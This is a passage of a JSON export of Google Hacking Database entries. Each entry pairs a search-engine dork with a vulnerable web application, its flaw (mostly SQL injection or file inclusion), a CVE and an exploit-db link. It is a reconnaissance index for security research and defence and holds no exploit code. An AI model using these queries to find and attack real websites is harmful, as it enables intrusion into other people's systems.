"2292", "link": "https://www.exploit-db.com/ghdb/2292/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+By+AJ+Auction", "shortDescription": "Powered By AJ Auction", "textualDescription": "AJ Auction Pro Platinum (seller_id) SQL Injection Vulnerability - CVE: 2008-6004: http://www.exploit-db.com/exploits/6561" }, { "signatureReferenceNumber": "2293", "link": "https://www.exploit-db.com/ghdb/2293/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=faqview.asp%3Fkey", "shortDescription": "faqview.asp?key", "textualDescription": "Techno Dreams FAQ Manager 1.0 Remote SQL Injection Vulnerability - CVE: 2006-4892: http://www.exploit-db.com/exploits/2385" }, { "signatureReferenceNumber": "2295", "link": "https://www.exploit-db.com/ghdb/2295/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by:+MFH+v1%22", "shortDescription": "\"Powered by: MFH v1\"", "textualDescription": "Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability - CVE: 2008-2521: http://www.exploit-db.com/exploits/5598" }, { "signatureReferenceNumber": "2296", "link": "https://www.exploit-db.com/ghdb/2296/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22com_beamospetition%22", "shortDescription": "inurl:\"com_beamospetition\"", "textualDescription": "Joomla Component (com_beamospetition) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14502" }, { "signatureReferenceNumber": "2297", "link": "https://www.exploit-db.com/ghdb/2297/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=intitle:+phpBazar-AdminPanel", "shortDescription": "intitle: phpBazar-AdminPanel", "textualDescription": "phpBazar admin Information Disclosure Vulnerability: http://www.exploit-db.com/exploits/14439" }, { "signatureReferenceNumber": "2298", "link": "https://www.exploit-db.com/ghdb/2298/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+By+4smart%22", "shortDescription": "\"Powered By 4smart\"", "textualDescription": "Magician Blog 1.0 (ids) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9282" }, { "signatureReferenceNumber": "2299", "link": "https://www.exploit-db.com/ghdb/2299/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=allinurl:+%22index.php%3Fshowlink%22links", "shortDescription": "allinurl: \"index.php?showlink\"links", "textualDescription": "Koobi Pro 6.25 links Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5411" }, { "signatureReferenceNumber": "2302", "link": "https://www.exploit-db.com/ghdb/2302/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Aurora+CMS%22", "shortDescription": "\"Aurora CMS\"", "textualDescription": "Aurora CMS Remote SQL Injection: http://www.exploit-db.com/exploits/10609" }, { "signatureReferenceNumber": "2303", "link": "https://www.exploit-db.com/ghdb/2303/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl+:/PhotoCart/", "shortDescription": "inurl :/PhotoCart/", "textualDescription": "Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability - CVE: 2006-6093: http://www.exploit-db.com/exploits/2817" }, { "signatureReferenceNumber": "2305", "link": "https://www.exploit-db.com/ghdb/2305/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+GetMyOwnArcade%22", "shortDescription": "\"Powered by GetMyOwnArcade\"", "textualDescription": "GetMyOwnArcade (search.php query) Remote SQL Injection Vulnerability - CVE: 2007-4386: http://www.exploit-db.com/exploits/4291" }, { "signatureReferenceNumber": "2306", "link": "https://www.exploit-db.com/ghdb/2306/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+By+:++PersianBB.com", "shortDescription": "Powered By : PersianBB.com", "textualDescription": "PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6858" }, { "signatureReferenceNumber": "2307", "link": "https://www.exploit-db.com/ghdb/2307/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=alegrocart", "shortDescription": "alegrocart", "textualDescription": "Alegro 1.2.1 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12278" }, { "signatureReferenceNumber": "2308", "link": "https://www.exploit-db.com/ghdb/2308/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:/hbcms/php/", "shortDescription": "inurl:/hbcms/php/", "textualDescription": "HB CMS 1.7 SQL Injection: http://www.exploit-db.com/exploits/9835" }, { "signatureReferenceNumber": "2309", "link": "https://www.exploit-db.com/ghdb/2309/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+Simple+PHP+Text+newsletter%22", "shortDescription": "\"Powered by Simple PHP Text newsletter\"", "textualDescription": "Simple PHP Newsletter 1.5 (olang) Local File Inclusion Vulnerabilities - CVE: 2009-0340: http://www.exploit-db.com/exploits/7813" }, { "signatureReferenceNumber": "2313", "link": "https://www.exploit-db.com/ghdb/2313/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22list.php%3Flcat_id%3D%22", "shortDescription": "inurl:\"list.php?lcat_id=\"", "textualDescription": "D-Tendencia Bt 2008 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10494" }, { "signatureReferenceNumber": "2314", "link": "https://www.exploit-db.com/ghdb/2314/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=allinurl:+%22com_estateagent%22", "shortDescription": "allinurl: \"com_estateagent\"", "textualDescription": "Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability - CVE: 2008-0517: http://www.exploit-db.com/exploits/5016" }, { "signatureReferenceNumber": "2315", "link": "https://www.exploit-db.com/ghdb/2315/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=powered+by+Php+Blue+Dragon+Platinum", "shortDescription": "powered by Php Blue Dragon Platinum", "textualDescription": "Php Blue Dragon CMS 2.9 Remote File Include Vulnerability - CVE: 2006-2392: http://www.exploit-db.com/exploits/1779" }, { "signatureReferenceNumber": "2316", "link": "https://www.exploit-db.com/ghdb/2316/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Designed+and+Developed+by+karkia+%3Chttp://www.karkia.org/%3E+E-commerce", "shortDescription": "Designed and Developed by karkia E-commerce", "textualDescription": "E-commerce Group (cat.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12696" }, { "signatureReferenceNumber": "2317", "link": "https://www.exploit-db.com/ghdb/2317/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22hlstats.php%3Fmode%3Ddailyawardinfo%26award%3D%22+hlstatsx", "shortDescription": "\"hlstats.php?mode=dailyawardinfo&award=\" hlstatsx", "textualDescription": "HLstatsX v1.65 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10850" }, { "signatureReferenceNumber": "2318", "link": "https://www.exploit-db.com/ghdb/2318/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by+Plogger!", "shortDescription": "Powered by Plogger!", "textualDescription": "Plogger Remote File Disclosure Vulnerability: http://www.exploit-db.com/exploits/14636" }, { "signatureReferenceNumber": "2321", "link": "https://www.exploit-db.com/ghdb/2321/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+DZcms%22", "shortDescription": "\"Powered by DZcms\"", "textualDescription": "DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7722" }, { "signatureReferenceNumber": "2323", "link": "https://www.exploit-db.com/ghdb/2323/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22com_event%22", "shortDescription": "inurl:\"com_event\"", "textualDescription": "Joomla Component com_event Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12633" }, { "signatureReferenceNumber": "2324", "link": "https://www.exploit-db.com/ghdb/2324/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Help+Desk+Software+by+Kayako+SupportSuite+v3.70.02", "shortDescription": "Help Desk Software by Kayako SupportSuite v3.70.02", "textualDescription": "Kayako eSupport v3.70.02 SQL Injection Vulnerability - CVE: 2010-2911: http://www.exploit-db.com/exploits/14392" }, { "signatureReferenceNumber": "2326", "link": "https://www.exploit-db.com/ghdb/2326/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22/alternate_profiles/%22", "shortDescription": "inurl:\"/alternate_profiles/\"", "textualDescription": "e107 Plugin alternate_profiles (id) SQL Injection Vulnerability - CVE: 2008-4785: http://www.exploit-db.com/exploits/6849" }, { "signatureReferenceNumber": "2330", "link": "https://www.exploit-db.com/ghdb/2330/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22This+website+is+powered+by+Mobius%22", "shortDescription": "\"This website is powered by Mobius\"", "textualDescription": "Mobius 1.4.4.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3420: http://www.exploit-db.com/exploits/6138" }, { "signatureReferenceNumber": "2331", "link": "https://www.exploit-db.com/ghdb/2331/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=intitle:WEBEYES+GUEST+BOOK+++++inurl:.asp%3Fid%3D", "shortDescription": "intitle:WEBEYES GUEST BOOK inurl:.asp?id=", "textualDescription": "WebEyes Guest Book v.3 (yorum.asp mesajid) SQL Injection Vulnerability - CVE: 2009-1950: http://www.exploit-db.com/exploits/8859" }, { "signatureReferenceNumber": "2332", "link": "https://www.exploit-db.com/ghdb/2332/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22visiteurs+v2.0%22", "shortDescription": "\"visiteurs v2.0\"", "textualDescription": "Les Visiteurs (Visitors) 2.0 (config.inc.php) File Include Vulnerability: http://www.exploit-db.com/exploits/2449" }, { "signatureReferenceNumber": "2333", "link": "https://www.exploit-db.com/ghdb/2333/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22com_portfol%22", "shortDescription": "inurl:\"com_portfol\"", "textualDescription": "Joomla Component com_portfol SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10844" }, { "signatureReferenceNumber": "2334", "link": "https://www.exploit-db.com/ghdb/2334/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+ZeeMatri%22", "shortDescription": "\"Powered by ZeeMatri\"", "textualDescription": "ZEEMATRI 3.0 (bannerclick.php adid) SQL Injection Vulnerability - CVE: 2008-5782: http://www.exploit-db.com/exploits/7072" }, { "signatureReferenceNumber": "2335", "link": "https://www.exploit-db.com/ghdb/2335/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:tr.php%3Fid%3D+Banner", "shortDescription": "inurl:tr.php?id= Banner", "textualDescription": "Banner Management Script (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-3749: http://www.exploit-db.com/exploits/6276" }, { "signatureReferenceNumber": "2336", "link": "https://www.exploit-db.com/ghdb/2336/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+By:+4images+1.7.1", "shortDescription": "Powered By: 4images 1.7.1", "textualDescription": "4images 1.7.1 Remote SQL Injection Vulnerability - CVE: 2006-5236: http://www.exploit-db.com/exploits/10572" }, { "signatureReferenceNumber": "2339", "link": "https://www.exploit-db.com/ghdb/2339/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Powered+by+Max.Blog%22", "shortDescription": "intext:\"Powered by Max.Blog\"", "textualDescription": "Max.Blog 1.0.6 (submit_post.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7898" }, { "signatureReferenceNumber": "2340", "link": "https://www.exploit-db.com/ghdb/2340/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:USP+FOSS+Distribution", "shortDescription": "intitle:USP FOSS Distribution", "textualDescription": "USP FOSS Distribution 1.01 (dnld) Remote File Disclosure Vulnerability - CVE: 2007-2271: http://www.exploit-db.com/exploits/3794" }, { "signatureReferenceNumber": "2341", "link": "https://www.exploit-db.com/ghdb/2341/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+dataface%22+%22powered+by+xataface", "shortDescription": "\"powered by dataface\" \"powered by xataface\"", "textualDescription": "Xataface Admin Auth Bypass Vulnerability: http://www.exploit-db.com/exploits/11852" }, { "signatureReferenceNumber": "2344", "link": "https://www.exploit-db.com/ghdb/2344/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22vbplaza.php%3Fdo%3D%22", "shortDescription": "inurl:\"vbplaza.php?do=\"", "textualDescription": "vBulletin vbBux/vbPlaza 2.x (vbplaza.php) Blind SQL Injection Vuln: http://www.exploit-db.com/exploits/8784" }, { "signatureReferenceNumber": "2346", "link": "https://www.exploit-db.com/ghdb/2346/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allintext:%22Powered+by:+TotalCalendar%22", "shortDescription": "allintext:\"Powered by: TotalCalendar\"", "textualDescription": "TotalCalendar 2.402 (view_event.php) Remote SQL Injection Vulns - CVE: 2007-3515: http://www.exploit-db.com/exploits/4130" }, { "signatureReferenceNumber": "2347", "link": "https://www.exploit-db.com/ghdb/2347/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+PHP+Dir+Submit+-+Directory+Submission+Script", "shortDescription": "Powered by PHP Dir Submit - Directory Submission Script", "textualDescription": "PHP Dir Submit (aid) Remote SQL Injection Vulnerability - CVE: 2009-3970: http://www.exploit-db.com/exploits/9484" }, { "signatureReferenceNumber": "2348", "link": "https://www.exploit-db.com/ghdb/2348/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:%22MAXSITE%22", "shortDescription": "intitle:\"MAXSITE\"", "textualDescription": "CMS MAXSITE 1.10 (category) Remote SQL Injection Vulnerability - CVE: 2008-2487: http://www.exploit-db.com/exploits/5676" }, { "signatureReferenceNumber": "2350", "link": "https://www.exploit-db.com/ghdb/2350/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Power+with+ecsportal+rel+6.5", "shortDescription": "Power with ecsportal rel 6.5", "textualDescription": "ecsportal rel 6.5 (article_view_photo.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8848" }, { "signatureReferenceNumber": "2351", "link": "https://www.exploit-db.com/ghdb/2351/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22list.php%3Fc%3D%22", "shortDescription": "inurl:\"list.php?c=\"", "textualDescription": "Prozilla Top 100 v1.2 Arbitrary Delete Stats Vulnerability - CVE: 2008-1785: http://www.exploit-db.com/exploits/5384" }, { "signatureReferenceNumber": "2352", "link": "https://www.exploit-db.com/ghdb/2352/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22weblink_cat_list.php%3Fbcat_id%3D%22", "shortDescription": "inurl:\"weblink_cat_list.php?bcat_id=\"", "textualDescription": "WHMCompleteSolution CMS sql Injection Vulnerability: http://www.exploit-db.com/exploits/10493" }, { "signatureReferenceNumber": "2354", "link": "https://www.exploit-db.com/ghdb/2354/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+YaBBSM+V2.5.0+Based+on+YABB+SE", "shortDescription": "Powered by YaBBSM V2.5.0 Based on YABB SE", "textualDescription": "YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability - CVE: 2006-5413: http://www.exploit-db.com/exploits/2553" }, { "signatureReferenceNumber": "2355", "link": "https://www.exploit-db.com/ghdb/2355/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+++++YDC%22", "shortDescription": "\"Powered by YDC\"", "textualDescription": "YDC (kdlist.php cat) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6811" }, { "signatureReferenceNumber": "2356", "link": "https://www.exploit-db.com/ghdb/2356/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+emuCMS", "shortDescription": "Powered by emuCMS", "textualDescription": "emuCMS 0.3 (cat_id) Remote SQL Injection Vulnerability - CVE: 2008-2891: http://www.exploit-db.com/exploits/5878" }, { "signatureReferenceNumber": "2359", "link": "https://www.exploit-db.com/ghdb/2359/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:%22Rx08.ii36B.Rv%22", "shortDescription": "intitle:\"Rx08.ii36B.Rv\"", "textualDescription": "RapidLeech Scripts Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/14430" }, { "signatureReferenceNumber": "2360", "link": "https://www.exploit-db.com/ghdb/2360/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22/lildbi/%22", "shortDescription": "allinurl:\"/lildbi/\"", "textualDescription": "LILDBI Shell Upload Vulnerability: http://www.exploit-db.com/exploits/14443" }, { "signatureReferenceNumber": "2361", "link": "https://www.exploit-db.com/ghdb/2361/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Design+by+BB+Media.Org%22", "shortDescription": "intext:\"Design by BB Media.Org\"", "textualDescription": "BBMedia Design's (news_more.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12718" }, { "signatureReferenceNumber": "2362", "link": "https://www.exploit-db.com/ghdb/2362/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=calendar.asp%3Feventdetail", "shortDescription": "calendar.asp?eventdetail", "textualDescription": "AspWebCalendar 2008 Remote File Upload Vulnerability - CVE: 2008-2832: http://www.exploit-db.com/exploits/5850" }, { "signatureReferenceNumber": "2363", "link": "https://www.exploit-db.com/ghdb/2363/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Copyrights+%C3%82%C2%A9+2005+Belgische+Federale+Overheidsdiensten%22", "shortDescription": "\"Copyrights \u00c2\u00a9 2005 Belgische Federale Overheidsdiensten\"", "textualDescription": "Newsmanager 2.0 (RFI/RFD/SQL/PB) Multiple Remote Vulnerabilities - CVE: 2008-2342: http://www.exploit-db.com/exploits/5624" }, { "signatureReferenceNumber": "2364", "link": "https://www.exploit-db.com/ghdb/2364/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Multi+Website+1.5", "shortDescription": "Powered by Multi Website 1.5", "textualDescription": "Multi Website 1.5 (index php action) SQL Injection Vulnerability - CVE: 2009-3150: http://www.exploit-db.com/exploits/9344" }, { "signatureReferenceNumber": "2365", "link": "https://www.exploit-db.com/ghdb/2365/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+iScripts+VisualCaster", "shortDescription": "Powered by iScripts VisualCaster", "textualDescription": "SQli Vulnerability in iScripts VisualCaster - CVE: 2010-2853: http://www.exploit-db.com/exploits/12451" }, { "signatureReferenceNumber": "2366", "link": "https://www.exploit-db.com/ghdb/2366/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=JBC+explorer+[+by+Psykokwak+%26+XaV+]", "shortDescription": "JBC explorer [ by Psykokwak & XaV ]", "textualDescription": "Explorer V7.20 Cross Site Scripting Vulnerability: http://www.exploit-db.com/exploits/10566" }, { "signatureReferenceNumber": "2367", "link": "https://www.exploit-db.com/ghdb/2367/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+DesClub.com+-+phpLinkat%22", "shortDescription": "\"Powered by DesClub.com - phpLinkat\"", "textualDescription": "phpLinkat 0.1 Insecure Cookie Handling / SQL Injection Vulnerability - CVE: 2008-3407: http://www.exploit-db.com/exploits/6140" }, { "signatureReferenceNumber": "2368", "link": "https://www.exploit-db.com/ghdb/2368/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by:+Zanfi+Solutions", "shortDescription": "Powered by: Zanfi Solutions", "textualDescription": "Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability - CVE: 2008-4159: http://www.exploit-db.com/exploits/6423" }, { "signatureReferenceNumber": "2369", "link": "https://www.exploit-db.com/ghdb/2369/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_equipment%22", "shortDescription": "inurl:\"com_equipment\"", "textualDescription": "Joomla Component (com_equipment) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14655" }, { "signatureReferenceNumber": "2371", "link": "https://www.exploit-db.com/ghdb/2371/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Everyone+should+be+on+TV!+Now+you+can+upload+2+TV%22", "shortDescription": "\"Everyone should be on TV! Now you can upload 2 TV\"", "textualDescription": "Youtuber Clone (ugroups.php UID) Remote SQL Injection Vulnerability - CVE: 2008-3419: http://www.exploit-db.com/exploits/6147" }, { "signatureReferenceNumber": "2376", "link": "https://www.exploit-db.com/ghdb/2376/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22+created+by+creato.biz+%22", "shortDescription": "\" created by creato.biz \"", "textualDescription": "Creato Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12807" }, { "signatureReferenceNumber": "2378", "link": "https://www.exploit-db.com/ghdb/2378/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by:+Southburn%22", "shortDescription": "\"Powered by: Southburn\"", "textualDescription": "southburn Web (products.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11430" }, { "signatureReferenceNumber": "2380", "link": "https://www.exploit-db.com/ghdb/2380/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+Blue+Dove+Web+Design%22", "shortDescription": "\"powered by Blue Dove Web Design\"", "textualDescription": "Blue Dove Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11360" }, { "signatureReferenceNumber": "2381", "link": "https://www.exploit-db.com/ghdb/2381/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=infusions/raidtracker_panel/thisraidprogress.php%3F", "shortDescription": "infusions/raidtracker_panel/thisraidprogress.php?", "textualDescription": "PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) SQL Injection - CVE: 2008-4521: http://www.exploit-db.com/exploits/6682" }, { "signatureReferenceNumber": "2383", "link": "https://www.exploit-db.com/ghdb/2383/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22phpsecurepages%22", "shortDescription": "inurl:\"phpsecurepages\"", "textualDescription": "phpSecurePages 0.28b (secure.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2452" }, { "signatureReferenceNumber": "2384", "link": "https://www.exploit-db.com/ghdb/2384/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+%22index.php%3Fmod%3Dgalerie%22action%3Dgal", "shortDescription": "allinurl: \"index.php?mod=galerie\"action=gal", "textualDescription": "KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability - CVE: 2008-6197: http://www.exploit-db.com/exploits/5350" }, { "signatureReferenceNumber": "2387", "link": "https://www.exploit-db.com/ghdb/2387/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Site+cr%C3%A9%C3%A9+avec+GuppY+v4.5.18+%C2%A9", "shortDescription": "Site cr\u00e9\u00e9 avec GuppY v4.5.18 \u00a9", "textualDescription": "GuppY v4.5.18 Blind SQL/XPath injection Vulnerability - CVE: 2010-1740: http://www.exploit-db.com/exploits/12484" }, { "signatureReferenceNumber": "2388", "link": "https://www.exploit-db.com/ghdb/2388/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Powered+by+WSN+Links+Basic+Edition%22", "shortDescription": "intext:\"Powered by WSN Links Basic Edition\"", "textualDescription": "WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility - CVE: 2007-3981: http://www.exploit-db.com/exploits/4209" }, { "signatureReferenceNumber": "2389", "link": "https://www.exploit-db.com/ghdb/2389/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/index.php%3Foption%3Dcom_rsfiles%22", "shortDescription": "inurl:\"/index.php?option=com_rsfiles\"", "textualDescription": "Joomla Component RSfiles 1.0.2 (path) File Download Vulnerability - CVE: 2007-4504: http://www.exploit-db.com/exploits/4307" }, { "signatureReferenceNumber": "2391", "link": "https://www.exploit-db.com/ghdb/2391/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+By+AstroSPACES", "shortDescription": "Powered By AstroSPACES", "textualDescription": "AstroSPACES (id) Remote SQL Injection Vulnerability - CVE: 2008-4642: http://www.exploit-db.com/exploits/6758" }, { "signatureReferenceNumber": "2393", "link": "https://www.exploit-db.com/ghdb/2393/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+FluentCMS", "shortDescription": "Powered by FluentCMS", "textualDescription": "FluentCMS (view.php sid) Remote SQL Injection Vulnerability - CVE: 2008-6642: http://www.exploit-db.com/exploits/5509" }, { "signatureReferenceNumber": "2394", "link": "https://www.exploit-db.com/ghdb/2394/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:dpage.php%3FdocID", "shortDescription": "inurl:dpage.php?docID", "textualDescription": "The Real Estate Script (dpage.php docID) SQL Injection Vulnerability - CVE: 2008-2443: http://www.exploit-db.com/exploits/5610" }, { "signatureReferenceNumber": "2397", "link": "https://www.exploit-db.com/ghdb/2397/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Foption%3Dcom_iproperty%22", "shortDescription": "inurl:\"index.php?option=com_iproperty\"", "textualDescription": "Joomla Component (com_iproperty) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14450" }, { "signatureReferenceNumber": "2398", "link": "https://www.exploit-db.com/ghdb/2398/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+WebStudio+eCatalogue%22", "shortDescription": "\"Powered by WebStudio eCatalogue\"", "textualDescription": "WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5294: http://www.exploit-db.com/exploits/7223" }, { "signatureReferenceNumber": "2400", "link": "https://www.exploit-db.com/ghdb/2400/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+JAF+CMS+%C2%A9+2004+-+2006", "shortDescription": "powered by JAF CMS \u00a9 2004 - 2006", "textualDescription": "JAF CMS 4.0 RC1 Multiple Remote File Include Vulnerabilities - CVE: 2006-7127: http://www.exploit-db.com/exploits/2474" }, { "signatureReferenceNumber": "2402", "link": "https://www.exploit-db.com/ghdb/2402/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+NovaBoard+v1.1.2%22", "shortDescription": "\"Powered by NovaBoard v1.1.2\"", "textualDescription": "NovaBoard v1.1.2 SQL Injection Vulnerability - CVE: 2010-0608: http://www.exploit-db.com/exploits/11278" }, { "signatureReferenceNumber": "2404", "link": "https://www.exploit-db.com/ghdb/2404/", "category": "Advisories and 